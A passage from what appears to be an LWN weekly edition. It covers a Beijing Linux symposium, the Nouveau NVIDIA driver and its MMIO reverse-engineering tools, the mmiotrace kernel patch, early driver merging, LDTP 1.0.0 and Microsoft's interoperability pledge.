PC and e-book reader would be very desirable, with bonus points awarded if that
transformation is fast and seamless.


A full-sized or nearly so keyboard is also a necessity.  Too much of the
work that we do involves words and numbers that need to be input.  If this
device is to become an integral part of a day-to-day routine, thumb
or child-sized keyboards just won't cut it.


Wifi and wired connectivity are obvious, while Bluetooth would seem to be a
good addition to provide internet via cell phone.  Some might want to
integrate actual cell phone functionality into the device itself—to avoid
the multiple device hassle.  Given that the size of a UMPC won't ever reach
that of a cell phone, that seems like a stretch, but for those who want it,
an optional feature seems like the way to provide that.


Like the OLPC, the device should be ruggedized, able to withstand
reasonable amounts of abuse without much more than a case scratch.  This is
another area where flash disks will help as there won't be the threat of
losing data when the disk heads suffer rapid deceleration.   The price per
gigabyte for solid-state drives will drop to the point where a few hundred
GB will be possible at a reasonable price.  Carrying around one's favorite
music as FLACs, rather than in some lossy format, should be possible.

A fairly modest and power-friendly processor with a GB or two of RAM should round out the
basics of the hardware.  The device will run Linux, of course, and might
have a few other peripherals: camera, microphone, speakers, etc.   All
should be available for $500-700, at least in a very functional low-end
configuration.  When might we see such a device?  Two to three years seems
quite likely, certainly before five years have passed.  When it's ready,
please send one to LWN for review in care of the author.


		A Beijing trip report


China would seem like an ideal environment for free software.  The Chinese
have a need for vast amounts of software as their country rapidly
industrializes, they have reasons to prefer software which is not controlled by
American corporations, and they have been coming under some pressure from
those same corporations to do something about their little habit of copying
proprietary software without much regard for details like license
agreements.  Free software offers them the ability to take control of their
own software, make sure it lacks unwelcome surprises, and copy it as much
as they like.  And China has been making a lot of use of Linux and free
software, but, as is the case with many Asian countries, China's presence in the
development community is relatively small.


Encouraging participation from Asian countries has been a goal of the Linux
Foundation for some time; one result of that is the series of symposiums
held in Japan over the last few years.  Now, for the first time, the
Foundation has extended this series to China.  On February 19
and 20, the first Linux Developer Symposium China was held in
Beijing.  This event was organized in cooperation with the China Open Source Promotion Union
(COPU).  Your editor had the privilege of speaking at this meeting. 


This was not the kind of developer-oriented gathering that one might expect
to find in many other parts of the world.  Far too many suits and ties, for
example.  Often the focus of the event appeared to be the creation of photo
opportunities while people (who were not developers) gave speeches.  In
general, it was organized in a mode of talking to the participants,
rather than talking with them.  The agenda
makes this clear: 17 speakers on the first day, with only one break (for
lunch).  The talks were well received by a sellout crowd, but there was not
a lot of opportunity for people to talk.


The second day featured a round table discussion and a set of BOF
sessions.  The round table was interesting, though it focused on issues
which are not necessarily development oriented: Linux adoption in mobile
devices, competing with pirated copies of Windows, etc.  The BOF was, in
many ways, the most interesting part of the whole event; this was where
participants could find people with similar interests and simply ask
questions.  Your editor fielded questions on security modules, the kevent
interface, community participation in Asia, language issues, and more.
Chinese developers, like their Japanese counterparts, seem to be reluctant
to ask questions in front of a large group.  But, in a closer situation,
the floodgates open and all kinds of questions come out.


Unfortunately, the second day was open only to a small subset of the
conference attendees, and that subset was heavy on the managerial side.  So
a lot of people who could have benefited most from the BOF session were
not there.


One topic which never came up - until your editor raised it briefly at the
round table session - was license compliance.  For the most part, it does
not seem to be on the radar there.  Your editor was told that GPL
violations are common with products which are sold in the Chinese market
but not exported elsewhere; the
people involved can assume, with seemingly good reason, that nobody will
take them to court.  There is also a fair amount of driver work being done
for companies in other countries; once the code is shipped the original
developers forget about it and move on to the next project.  Quite a bit of
that code never makes it into the mainline.


This sort of activity fails to give back to the community which provided
Linux in the first place.  But it also hurts the developers involved.  They
do not become part of the community, do not get recognition for their work,
and miss the opportunity to learn from others.  During the press conference
on the first day, it was noted that Chinese companies are having a hard
time hiring Linux developers, and that more training opportunities would be
a good thing.  Your editor felt the need to point out that, of all the
people working in free software projects, very few of them are specifically
trained to do so.  It's more a matter of individual initiative.  Training
is good, but the training received in Chinese universities should be more
than adequate for those looking to get involved with free software.


Andrew Morton took that theme further by pointing out that, rather than
complaining about difficulties in hiring, these companies
would be better off encouraging community participation and skills
development within their existing staff.  That would be more productive
than chasing the same small set of
developers that everybody else is trying to hire.  On the second day, Dave
Neary made the crucial point that community participation is something that
individuals - not companies - do.  There are a lot of companies worldwide
which have a hard time understanding how free software development works,
and China is no exception.


One last note on hiring free software hackers.  Your editor ran across this
article, which states:


	In China, 43 per cent of IT graduates are unemployed, and hacker
	"training" web sites are creating a pool of effective malware
	authors and paying them like a legitimate business. 


In such a situation (assuming the claim is true - something your editor
cannot vouch for), finding developers who
are able and willing to learn how to hack on free software should not be
that hard.


Meanwhile, your editor was struck by the energy and initiative shown by the
Beijing Linux Users
Group, which helped with many aspects of the event.  BLUG is busily
organizing gatherings and creating a local community out of Beijing's
hackers.  A real spark is glowing there; it will be interesting to see how
that group develops in the near future.  


All told, the event was a clear success.  It was a proper media event which
raised the profile of Linux in China and showed that Linux developers care
enough about the country to pay a visit.  A mixture of local and imported
developers were able to present their work to an attentive and interested
audience.  The discussions brought developers closer and, hopefully, sent
them away with interesting things on their "to do" lists.  And,
importantly, the visiting developers learned something about China that
goes beyond the proper technique for eating Peking Duck or the effort
required to climb the Great Wall (or to circumvent the rather obnoxious great
firewall).  With luck, we have a better understanding of what developers
are up to in that part of the world and how we can help them to participate
fully in our projects.  And that can only be a good thing.


(Some
pictures from the event have been posted.  Unbelievable numbers of
photos were taken, so more can be expected to surface at some point.  But,
under no circumstances should anyone look at the scurrilous photo posted by
Andrew Morton.)

		The state of Nouveau, part 2


[Editor's note: this is the second in a two-part series on the state of
the Nouveau driver for NVIDIA hardware.  The first installment is recommended
reading for those who have not yet seen it.]

Sources of information, and reverse engineering tools

As very little information is available on NVidia's hardware design and
implementation, the Nouveau project has developed a number of tools to gain
a better understanding of card architecture and programming model.  These
tools, along with some previously available information, are what are used
to create the driver.

The Haiku/BeOS projects have a driver that came from a software development
kit NVidia released
for NV03/04 cards, and also gathered some information from an unobfuscated
nv driver that appeared briefly in XFree86. This driver has improved
mode-setting code compared to nv, and a basic 3D driver using hard-coded
objects running in a single context.

More information was available in the nvclock utility, which allows
overclocking NVidia GPUs on Linux. Its lead developer Roderick Colenbrander
(Thunderbird) has helped out Nouveau in the clock setup, i2c and tv-out
areas.

renouveau

<!-- LWNPutAdHere -->
The first utility developed was called renouveau. renouveau is mainly
concerned with reverse engineering the NVidia binary driver by black-boxing
it, feeding it certain inputs and watching what it writes to the
hardware. It runs a large batch of OpenGL tests which exercise most of the
GPU's capabilities and generates a set of dump files which are sent to the
Nouveau developers.

The tool works by mapping the card registers and the FIFO assigned to the
current application.  It then records the current state of both FIFO and
registers, executes small OpenGL tests, and compares the final state
against the initial saved state.  It then dumps this info, which can be
parsed into a human readable form using an XML register/command
database. (Some developers would argue the hex is readable to them).

The tool has advantages in that it can be run very simply by end users, on
various card architectures, without requiring root privileges. It doesn't
tamper with the binary driver, and does not require much technical
knowledge.

MMioTrace

MMioTrace is a tool for tracing memory-mapped I/O (MMIO) access within the kernel. The NVidia
driver contains a kernel module which is responsible for a lot of card
initialization and mode setting. This activity cannot easily be traced by user-space
tools such as renouveau. MMioTrace uses relayfs and debugfs to relay the
tracing data to userspace.

MMioTrace works by replacing calls to the kernel's ioremap(),
ioremap_nocache(), 
and iounmap() calls from the driver that is to be probed with wrappers that call into
MMioTrace. When the driver module in question calls ioremap() to access the
MMIO registers, the pages are mapped as not-present in the kernel address
space instead. It can be set up to only trace address ranges which are
likely to be touched by the driver you are interested in, thus reducing the
amount of useless MMIO accesses.
 
When the module then tries to access the register space, a page fault will
occur.  In the page fault handler the address is detected and the attempted
action recorded.  The page is then marked present and the page-faulting
code is single-stepped to execute the instruction doing MMIO. After that
the page is set to "not present" again so that the cycle can be restarted
for the next access to the page.

MMioTrace has some restrictions on tracing into the legacy ISA address
range, as marking those pages not present crashes the kernel. A solution to
this may be forthcoming but would require patching the kernel.

MMioTrace is usable for all types of drivers running in the kernel, not
just graphics drivers.  It is not shipped with the kernel as of yet and was
shipped as a working external module up 2.6.23.  However 2.6.24 has seen
the removal of certain features that mean MMioTrace will need to be
upstreamed for it to work with 2.6.25 or later kernels.  

If you are interested in more details, you should have a look at the 
MMioTrace page.

valgrind-mmt

Valgrind-mmt is a plugin for the valgrind debugging suite. It traces MMIO
accesses from a user-space process (like the X.org server) where the NVidia
DDX code
is loaded. This was originally written by Dave Airlie for tracing ATI
hardware and has since been extended by a number of other developers.  It is used in
Nouveau in a way similar to renouveau: to dump the contents of a FIFO.
Valgrind-mmt allows reliably tracing the X.org FIFO, which is something
renouveau cannot do very well. Tracing the X.org FIFO is sometimes required
as it is the only way to see how some 2D features are implemented.

Using MMioTrace to implement a new feature

Commands are usually sent to the card by writing in the command FIFO, not
by touching registers directly.   But initialization of the card (including
notably mode setting), as well as some other operations, are done via MMIO
operations from within the kernel.

Below is an example of how MMioTrace was used to reverse engineer the YV12
video overlay that is present in some NVidia cards.


Video formats

Videos are usually not encoded in the RGB colorspace. Most video codecs
work in the YUV colorspace instead, where Y stands for luminance (black and
white image), and U and V represent the chrominance (i.e. color). Since eye
perception is higher for luminance, codecs usually drop a fraction of U and
V samples in order to save space. When the card is asked through
e.g. X-Video to display a video frame, it is passed a buffer containing YUV
data, usually in YV12 or YUY2 format. 

FourCC.org can give you details about
those formats, but for 
the purposes of this article, we will just say that YUY2 is a format that
keeps one chrominance sample (U or V alternatively) per luminance sample,
thus giving "YUYVYUYV" to the card (16 bits per pixel), and YV12 is a format that
keeps two chrominance samples (one U, one V) per 2x2 luminance block, which
gives an effective 12 bits per pixel of video. YV12 is 25% smaller than
YUY2 and is the format used by most popular codecs. Your author has yet to
find any movie codec that does not output YV12. (or I420, which
conceptually is the same - it just inverts the position of U and V in the
buffer).


Some months ago, Nouveau's Xv implementation was inherited
from nv. Besides being extremely slow, nv supported only the YUY2 format, and
converted YV12 input to YUY2 in software before uploading the data to the
card. While working on improving performance, we quickly came to wonder if
NVidia cards supported YV12 in hardware. Due to the 25% size reduction,
this would naturally decrease the volume of bus transfers, which plays a
very important role in Xv throughput especially on PCI cards.

We verified that by running performance tests on the NVidia binary driver,
playing YV12 and YUY2 videos (using mplayer's -yuy2 option). Our performance
tests consisted simply of mplayer's "benchmark" mode. The results were
extremely clear: the operation required just over 20 seconds in YUY2 mode, and in
just over 15 seconds in YV12 mode.
No need to take your calculator, it is a 25% difference which matches the
data size exactly. The most obvious explanation is that the data is sent to
the hardware in YV12 format.

So the situation was: we had a Xv driver that handled YUY2 video only, we
knew (or thought, with a high degree of confidence and hope) that the
hardware supported YV12, but no existing driver like rivatv had code for
it. Some reverse engineering had to take place.

MMioTrace doesn't enter the arena just now, however. As mentioned above,
most of the time, commands are sent to the card by writing to the command
FIFO, and not by touching registers. So we first checked the X command FIFO
using valgrind-mmt and found some commands related to video.

However, it quickly turned out that those were software methods, that is to
say, dummy methods that make the card generate an interrupt asking for the
kernel to handle it.  It's somehow similar to an ioctl() call into the
kernel module, except that it's in sync with the FIFO. First lesson
learned: Video overlay setup is being done by the kernel module.

We then MMioTraced the NVidia binary driver, playing YUY2 and YV12 video
(same dimensions, window position, ... - the only thing that differed was
the format), and compared the outputs. And among the 150 kilobytes of resulting data,
we found (for YUY2 mode):


While for YV12 mode:


So here we had a different value being written into FORMAT, and three
unknown registers. From a reading of existing documentation and code, it turned out
that the bit 0 of FORMAT was previously unknown to us.

Next we tried to get the feature to work in our driver.  We tried it
without touching the three unknown registers, and got no video at all. So it had
an effect, but we weren't sure if it really was the "YV12 format"
bit. Further looking into MMioTraces showed that what was written into the
three registers was in fact fairly similar to what was done for the image
buffer setup, and we were able to make an educated guess at what was
supposed to be written here. (It was the set up of the color buffer, while
the "main" buffer was used for luminance data.)

In the end, we got YV12 to work in Nouveau's Xv without converting to YUY2,
which represented an increase in performance of (about) the expected 25%.
MMioTrace enabled us to discover how the card needed to be programmed to do
YV12 in hardware, which was apparently known by nobody outside of Nvidia
before.

This knowledge ended up in nv_video.c in NVPutOverlayImage:


It is interesting to note that MMioTrace simply records all register reads
and writes - you can see almost everything that the kernel module does to
the card.  The downside to "almost everything" is that the saved data set
gets large fast.  Reducing the trace range and using it only for short
periods of time helps a bit but still...
after a few minutes of mmiotracing, you will get into the megabyte range
for your logs. Sifting through those thousands of lines to find what one is 
looking for takes some time to get used to.

We used MMioTrace to reverse-engineer YV12 overlay, but we also used it to 
reverse-engineer a very large part of card initialization code and
mode setting - and it will most certainly be useful for many other things that
involve a kernel module.
It is not limited to Nouveau, and is able to trace MMIO operations from any
of your (binary) kernel modules, thereby allowing reverse-engineering of
drivers for other hardware.

Current development in Unix graphics and its influence on Nouveau

We'll now take a peek into the future of 3D acceleration on Linux.  2007
saw a number of major changes in how Linux and X11 handle
graphics. A lot of improvements are coming into use: EXA for 2D
acceleration, TTM for memory
management, Gallium3D for 3D, the new DRI2 
interface, etc.  All this needs driver-side changes, which can take some time
to be done.

With the advent of programmable graphics hardware, the old graphics driver
model in Mesa became unsuitable. The current Mesa model is designed for
cards which are based around OpenGL fixed-function
operations. Fixed-function cards have hardware blocks designed for each part
of the GL pipeline. The driver model for this requires each new piece of
fixed functionality to call into the driver, which can get complex. This
also causes a lot of code to be duplicated in each driver.

A new driver model, called Gallium3D, tries to simplify the driver
interface and increase the amount of shared code. It is designed to cater
for OpenGL 3.0's needs as well as current OpenGL and DirectX APIs. It is
also designed to allow portable drivers across all major platforms/OSes. It
assumes programmable graphics hardware with, at least, fragment shaders.

Now that we know why the design was changed, let's have a look at the
architecture of Gallium3D. Gallium3D splits the DRI driver into 3 major
components, the common "state tracker", the OS dependent "winsys" layer and
hardware specific 3D driver.
The winsys is in charge of 2D action and most of the housekeeping and
OS-specific bits, while the hardware driver does the 3D. Each driver needs
to implement a hardware driver and a Winsys part. If an existing driver
gets ported to another OS, only the Winsys parts needs to be redone.

There is also a fully working reference software 3D driver called softpipe. 
It is a software renderer showing the Gallium3D concepts and how to implement 
them, which also acts as a software fallback driver for things the hardware
cannot handle.

Another component of the new graphics subsystem is the TTM based memory
manager. TTM is a unified in-kernel manager for all GPU accessible memory.
Previous memory management was split between X drivers, mostly using static
allocations. TTM was originally designed and implemented for Intel
hardware, and had to be adapted to handle NVidia hardware and Nouveau
software design. The main feature added to TTM was called fence classing,
which was required to support NVidia's multiple hardware contexts.

Current Status

When we shifted work from reverse engineering to driver development last
year, we were asked when a driver would be ready. We predicted late 2007,
but we only got part of the work done.

Except for NV5x cards, we basically have a good-to-reasonably-well working
2D driver. Releasing an official "2D" driver was considered but, at this
point, the kernel interfaces are not considered stable enough to support
for the
long term. When a DRM kernel module is shipped in Linus's kernel, the
interfaces are required to be supported indefinitely. This would be unwise
for Nouveau as the interface is evolving to accommodate changes for TTM and
mode setting, and supporting old interfaces may place hard-to-support
requirements on newer ones.

Currently, Nouveau can claim:

 basic 2D rendering on all cards (through EXA)
 EXA composite (implementing the XRENDER extension) works via the 3D engine on 
   all cards except NV5x and NV04. In the case of NV04, hardware limitations
   make a composite implementation difficult if not impossible.
   NV1x was just recently completed, which was a major feat as
   these cards only have two fixed function register combiners and no shaders
 Xv from NV04 up to NV4x thanks to the work of Arthur Huillet.
   Depending on the hardware, either blitter (on NV4-&gt;NV4x), overlay (on NV4-&gt;NV30) or video texture (on NV40).
   Xv performance is on par with that of the nvidia binary driver on some cards.
 PPC support:
   at least some PPC based systems work. Most endian-based problems
   are solved thanks to the help of the PS3 RSX project and Ben Herrenschmidt. However,
   some systems are exhibiting DMA hangs when trying to do uploads to the
   card. The code is currently being audited and most of the PPC bugs have been fixed.
 xrandr 1.2 support is being worked on, basic mode setting should work mostly 
   on NV3x, NV4x and NV5x cards. More sophisticated features, like dual head
   support, are actively being worked on and progress is fast.
 the Nouveau specific DRM code has some preliminary work done for TTM. e.g.
   we have one FIFO allocated for DRM use only. However, a fair amount of work
   is left until we have something really useful there.
 Ben Skeggs is working on a Gallium3D driver for NV4x and NV5x. This driver does 
   work for NV4x but is neither feature complete nor bug free. NV5x does not work 
   currently.
 Stephane is working on supporting shaderless cards with Gallium3D. That would
   be a generic framework which, in case of NVidia cards, could support 
   shader instructions on cards ≥NV04 &lt;NV30. This framework is not specifically
   designed for NVidia cards but should help older ATI/Intel cards too.


The weak spot is currently the NV50. On these cards, 2D is working the same
as nv but saving and restoring the console / virtual terminal state doesn't
work.

All that is nice and somewhat important to have, but I hear you ask "what
about 3D"?  The short answer is: We don't have 3D working.  The longer
answer is: NV5x doesn't work and needs more reverse engineering as a lot
has changed from NV4x. For all other cards the needed information is
available but there are many pieces in the puzzle to build a final driver.

As a proof of concept, glxgears works on NV1x, NV3x and NV4x but with some
glitches.  However, work on the Mesa DRI driver has ceased in order to
target Gallium3D.
A somewhat working Gallium3D driver exists with many bugs and glitches.
The NV4x is getting better everyday but isn't usable for games
yet. Gallium3D itself is still a work in progress and the same holds true
for our Gallium3D driver.

Currently, a fair amount work is going on in the mode setting field, with
Maarten Maathuis and Stuart Bennett enhancing this part of the code. This
leads to RandR1.2 (dual head) support in Nouveau. Once this is done, we
plan to move it into kernel land, following the other drivers. A kernel API
has been defined for that purpose.  Basically this API looks like a
simplified randr1.2 api which should 
make porting easy.

So what is coming next?
This is only a rough outlook of what we want to do mid term:


 Finish 2D work which includes mode setting and RandR1.2
 more reverse engineering for NV5x cards.
 Implement TTM support 
 Implement Gallium3D drivers. This one is obvious for the cards with
   shaders, However as Gallium3D expects shaders,  older cards are left in the cold
   unless Stephane gets his framework working. 
   In case the framework isn't feasible, a DRI driver for older cards may be
the only option.


By the way: If you are interested in more details, please have a look at
our Wiki and TiNDC ("The Irregular Nouveau Development Companions") or join
us in #nouveau on freenode (logs are available).

So to keep tradition lets have some screenshots.   Here's a shot of Neverball running under the
Nouveau driver:


And OpenArena with a Nouveau Gallium3D build from January 2008 
displays this:


It seems the weapon is a bit too dark but otherwise we couldn't find obvious 
differences.

Further information about Gallium3D can be found on the
Tungsten Graphics site.

Conclusion

So that is our current status, our roadmap shows the next milestone would be 
Quake which is not so far away on NV4x, but which has some problems to overcome on
the other cards. Our first estimate of Autumn / Winter 2007 held up well for 
the 2D part but, as we detailed earlier, was somewhat delayed due to decisions
out of our control like TTM and Gallium. However, the decision was the right
one as Nouveau will be one of the most advanced and future proof drivers
available.

And finally:
I would like to take this opportunity and thank Arthur Huillet, Ben Skeggs 
David Airlie and Stephane Marchesin for their great help on this article. It 
definitely was a team effort!

		Tracing memory-mapped I/O operations


Device drivers, in the end, usually do one thing: they communicate with the
hardware by way of a set of memory-mapped I/O (MMIO) registers.  So when
one is trying to figure out what a driver is doing - for debugging
purposes, perhaps - it is often interesting to look at the sequence of MMIO
operations the driver performs.  If one is trying to reverse-engineer a
driver which is available only in binary form, watching what is done with
MMIO registers may be the only way to figure out how the hardware works.
To this end, the developers behind the Nouveau project developed a tool
called "mmiotrace" which helps them to watch which is going on with
memory-mapped I/O.  Now that tool is being fixed up and pushed toward the
mainline.

<!-- LWNNoRightSideAd -->
Drivers gain access to MMIO regions with ioremap() (or one of the
higher-level functions like pci_iomap()), so that is the logical
place to hook in a tracing infrastructure.  So the current mmiotrace patch adds
some new variants of ioremap():


These functions perform like ioremap() and
ioremap_nocache(), in that they return a I/O memory pointer which
can be used by the driver to get at MMIO space.  What goes on internally,
though, is quite different.

On the x86 architecture (as with most others), I/O memory space is accessed
with memory operations through the page tables in the usual way, so ioremap() just
returns an address which maps onto the desired physical space.  The tracing
versions, though, take the extra step of marking the pages within the I/O
region as not being present in the system; as a result, whenever code
attempts to access that space, a page fault will be generated.

Normally, page faults incurred when running in kernel mode will cause a kernel
oops.  There are exceptions, though; the functions which copy data between
user and kernel space are one example.  The mmiotrace patch adds another
exception which tests faulting addresses against the MMIO region(s) being
traced.  Should the address indicate that an MMIO access is being
attempted, the mmiotrace code will:


 Mark the relevant page as being present in memory.

 Set the TF (trace) bit in the faulting thread's processor state mask.

 Invoke a "pre" handler provided by higher-level tracing code.

 Indicate that the fault has been handled and return to the faulting
code.


Once all this has happened, the instruction which originally caused the
page fault will be rerun, successfully this time.  But the setting of the
trace bit will cause a new processor trap after that instruction has been
executed.  At that point, the page is marked unavailable once again,
the trace bit is reset (assuming it wasn't set elsewhere), the tracing
layer's "post" handler is called, and life continues as normal until the
next fault happens.


The tracing layer really only has one task: figure out what the code was
trying to do in MMIO space and log the action by way of the relay
interface.  Figuring things out means learning enough about the instruction
which caused the page fault to determine which address was being accessed,
whether a read or write was being performed, the size of the data being
transferred, and the actual value read or written.  So there is a certain
amount of architecture-specific instruction grubbing code involved, which,
for the current patch, is only provided for x86 machines.


Since tracing is enabled by calling a special version of
ioremap(), it is not possible to trace a driver module without
making changes to its source and rebuilding it.  That might seem like a strange requirement
for a tool meant to help with reverse engineering (among other things).
The driver being studied by the Nouveau project uses a GPL-licensed shim to
link into the kernel, so making modifications in that case was not a hard
thing to do.  A more general solution may eventually need to be found,
though, for situations where that sort of glue layer is not present.


Beyond that, this patch is likely to go through a number of changes before
it finds its way into the mainline.  Reviewers have found a number of
things which need fixing, and there's a few too many places in the code
where the comments say (literally) "if this happens, all hell breaks loose."  It also
seems likely that mmiotrace will be merged with the recently-posted ftrace tracing mechanism.  There is time to
get this work done before the 2.6.26 merge window opens, but the mmiotrace
hackers will need to keep the work moving forward.

		Merging drivers early


Drivers tend to be a world unto themselves, with bugs only affecting a
subset—often a tiny subset—of kernel users.  Until a driver
gets merged into the kernel though, anyone wishing to test it, or help clean it
up, has to jump through some hoops.  To try and help reduce those barriers,
Linus Torvalds and others have been advocating early merging of drivers;
getting them into the kernel and incrementally improving them from there.


This policy of early merging of drivers is not universally embraced, with a
recent remote DMA (RDMA) ethernet driver, which lives in the infiniband
tree, getting singled
out.  Based on the problems he observed in the driver, Adrian Bunk asked: "Is it really intended to merge
drivers without _any_ kind of review?"  This was, perhaps, an overly
dramatic question as the driver has undergone review, but not all of the
changes have been reflected in the mainline version.  There is
still work to do, as Infiniband maintainer Roland Dreier points out:

Just to be clear, this driver was reviewed.  Many issues were found,
and many were fixed while others are being worked on.


It's a judgment call when to merge things, but in this case given the
good engagement from the vendor, I didn't see anything to be gained by
delaying the merge.


It is a sentiment shared by other kernel hackers as well.  When there is a
developer who is responding to the feedback along with a working driver,
getting it into the mainline kernel—where more eyes can scrutinize
it—is seen as a positive step.  Torvalds is very interested in seeing
drivers earlier so that more collaboration can happen:

I'd really rather have the driver merged, and then *other* people can send 
patches!

The thing is, that's what merging really means - people can work on it 
sanely together. Before it's merged, it's a lot harder for people to work 
on it unless they are really serious about that driver, so before 
merging, the janitorial kind of things seldom happen.


Other maintainers explained their criteria for accepting drivers that are
not quite up to usual kernel standards.  The consensus seems to be that
drivers with the following characteristics are acceptable:

compiles and seems to work
has no obvious security holes
has an active maintainer
does not affect people who don't have the hardware
does not introduce unnecessary or not fully thought out user space interfaces


There is little in the way of a downside to making drivers available
earlier.  Since they are self-contained, they generally don't cause problems
elsewhere in the kernel.  As long as reviewers are keeping an eye out for
security problems, which could lead to an unsuspecting user's box being
compromised, there are not many ways for a driver to negatively impact the
kernel as a whole.
User space interfaces via ioctl(), sysfs, or other means also need
to be closely examined as they will have to be maintained as part of
the kernel interface.


Along the way, much grumbling was heard about checkpatch, the perl
script that complains about various stylistic problems with a patch.
Notably absent from the list above is any kind of requirement that
checkpatch errors or warnings be handled.
The
main complaint against checkpatch is its checks for line length; the resulting
"fixes" to kernel source sometimes leave much to be desired.  While it is generally agreed that too many
overly long lines can result in code that is difficult to read, exactly
what constitutes such a line tends to be an aesthetic judgment.
Slavish adherence to a fixed number of characters on a line in order to appease
checkpatch is clearly seen as a problem.


To some, this makes checkpatch less than useful, bordering on dangerous to
readability.  Torvalds stated that he has considered removing it from
the kernel tree on more than one occasion.  Human judgment is required to
interpret the warnings from checkpatch and sometimes it is not
being applied.  On the other hand, Ingo Molnar gives an impassioned defense of the tool:

Based on this first hand experience, my opinion about checkpatch has 
changed, rather radically: i now believe that checkpatch is almost as 
important to the long term health of our kernel development process as 
BitKeeper/Git turned out to be. If i had to stop using it today, it 
would be almost as bad of a step backwards to me as if we had to migrate 
the kernel source code control to CVS.


Molnar goes on to outline the pros and cons of checkpatch, all of which
stands in stark contrast to some of his earlier
complaints about the tool.


For most drivers, the path into the
kernel has been made a lot easier.  This will have the effect of
getting working, or mostly working, drivers into the hands of users more
quickly. More importantly, it will also get the code into the hands of the Linux kernel
community faster.  The likely result is a fully working, cleanly
coded driver sooner than it might have happened in the past.  An already
quick turnaround for hardware support in Linux may have just gotten faster.


		The Linux Desktop Testing Project reaches the 1.0.0 release


The 
Linux Desktop Testing Project
is a cross-UNIX GUI testing framework.
The project was started in 2005.
In the Linux world, LDTP originally just supported the GNOME desktop
environment.
KDE support was planned from the beginning, this capability is
now in place with the recently released KDE 4.0.
In addition to operating with the two major Linux desktops,
LDTP is being used by Mozilla and OpenOffice.org.
From the LDTP home page:


Linux Desktop (GUI Application) Testing Project (LDTP) is aimed at producing high quality test automation framework and cutting-edge tools that can be used to test Linux Desktop and improve it. It uses the Accessibility libraries to poke through the application's user interface. The framework also has tools to record test-cases based on user-selection on the application. LDTP is a Linux / Unix GUI application testing tool. It runs on Linux / Solaris / FreeBSD / Embedded environment (Palm source).


Version 0.8 of LDTP was
investigated
last February on LWN, take a look to get an overview of the software's
operation.
LDTP version 0.9.0 was
released
in August 2007, it featured new Firefox automation support and bug fixes.
This week, version 1.0.0 was
announced:

<!-- LWNNoRightSideAd -->

This release features
number of important breakthroughs in LDTP as well as in the field of Test
Automation. This release note covers a brief introduction on LDTP followed
by the list of new features and major bug fixes which makes this new version
of LDTP the best of the breed. Useful references have been included at the
end of this article for those who wish to hack / use LDTP.

New features in this release include the
Object Oriented LDTP, the LDTP Editor with

record and replay
functionality, major bug fixes and lots of work on the

documentation.
The Linux Desktop Testing Project is maturing and its scope is
getting wider.


LDTP can become an important tool for automated
testing of GUI-based applications.  With a bit of effort on the
part of developers, LDTP can improve the quality of applications
and speed up the testing of new releases.


		Interoperating with Microsoft


Last week, with much fanfare, Microsoft announced
a change in its practices in order to "expand interoperability".  It is a
rather sizable shift away from some of its previous inflammatory statements about free
software—though it scrupulously avoids that term—but whether it is the harbinger of a more open Microsoft, or yet another
empty pronouncement, is still unclear.  It does contain things of interest to the
community, in particular the patent enumeration, but there are
pitfalls as well.


The largest chunk of what Microsoft promises is documentation for APIs and
protocols used by some of their most popular products.  They immediately
released some 30,000 pages of Windows protocol specifications, much of
which the
Samba project
had to pay to access last December.  In addition, they will be
releasing documentation suitable for developers wishing to interoperate
with "Windows Vista (including 
the .NET Framework), Windows Server 2008, SQL Server 2008, Office 2007,
Exchange Server 2007, and Office SharePoint Server 2007, and future
versions of all these products."  


Microsoft has also promised to list which of the documented protocols are
covered by one of its patents or patent applications.  We may finally start
to get a handle on the infamous "235 patents" that Linux and free software
supposedly infringe.  These patents will be available for license on the
standard 
"reasonable and non-discriminatory" (RAND) terms, with an interesting
addition: "low royalty rates".  The patent list is not yet available, but
may be of use in ways that Microsoft does not intend; invalidating some of
the patents
with prior art for example.


As Microsoft is well aware, RAND terms are a non-starter for free
software because they restrict redistribution of the code.
The company has tried to soften that blow, perhaps, by rehashing its 
"covenant not to sue" developers that originated as part of the Novell
interoperability agreement.  The covenant may be a great public relations
ploy, but does little to alleviate concerns that free software developers
will have in implementing patented protocols.  It is the rare developer who
finds an itch to develop code to talk to Microsoft servers and who has no thought
of using or distributing it commercially.


There are also provisions in the announcement for documentation of
Microsoft implementations of industry standards.  A cynic might wonder why
additional information is needed, they are, after all, supposed to be
standards.  The unfortunate reality is that Microsoft does extend
such standards for its own purposes in incompatible ways; having that
kind of information can only help web browsers, directory services, and
other multi-platform tools. 


For a company as adamantly opposed to Open Document Format (ODF) as it
claims to be, it is a bit surprising to see that they plan changes to
Microsoft Office to "promote user choice among document formats".  APIs for
document format plug-ins along with the ability for users to make their own
choice about the default save format will be added.  How reasonable those
APIs are and how faithfully they can encapsulate Office documents will be
an interesting test of both Microsoft's sincerity and ODF's capabilities.
It is also a pretty clear attempt to at least appear to be playing nicely with ODF
while its competing OOXML format is being considered for an ISO standard.


There are also various platitudes about "opening dialogs" and "expanding
outreach" with the community included in the announcement.  It will be interesting to see how
that actually plays out.  It is, however, hard to imagine even a year ago
seeing a posting on a Microsoft-sponsored site entitled "How
open source has influenced Windows Server 2008".  In less than seven years, we
have moved from a "cancer" to influencing its flagship products.


One obvious conclusion that can be drawn from this and other Microsoft
initiatives is that it is feeling a fair amount of pressure from
customers, the European Union, standards groups, and free software.  These kinds of
changes, even if they don't go as far as the rhetoric would lead one to
believe, are a pretty substantial shift in Microsoft culture and thinking.
Unfortunately, they do also seem to be angling for the long-sought "Linux
tax"—a payment, even just a small one, for each and every Linux deployment.


So far, Microsoft doesn't seem to have caught on to the idea that most Linux
installations are free in both senses of the term.  There is no
per-installation, per-processor, per-core licensing stream to tap into.
One of the headaches that free software users avoid is keeping track of all
those licenses, enforced by the ever-present threat of a Business Software
Alliance audit.  It has, to a limited extent, already tapped into—and
likely tapped out—that
revenue from the deals with Novell and other distributors.


Overall, this seems like a positive step.  It clearly acknowledges the role
that free software (or open source if you prefer) is playing in both the
commercial marketplace and the marketplace of ideas.  The actual
effects of this announcement for our community may be small, but it may
also be indicative of Microsoft moving in a more cooperative direction.  That
would be a rather nice thing to see.


		A brief look at some distribution news


In the process of reading through a number of distribution mailing lists
your editor encountered several items that seemed worthy of mention, but
none that seemed to provide enough for a complete article.  So the
following will be a brief look at a variety of topics.

The Fedora Bug
Zappers subproject was recently
announced on the fedora-devel mailing list.  This is a team of people
who triage bugs and act as a bridge between the users and developers.  The
team is meeting regularly, and new bug zappers are always welcome.

Donnie Berkholz ran an informal survey that was answered by 50 Gentoo
developers.  The results have been graphed, one page per question.  For
example, the question "What are the top 3 issues facing
Gentoo?" is here.
"Developers' top 5 issues are manpower, publicity, goals, developer
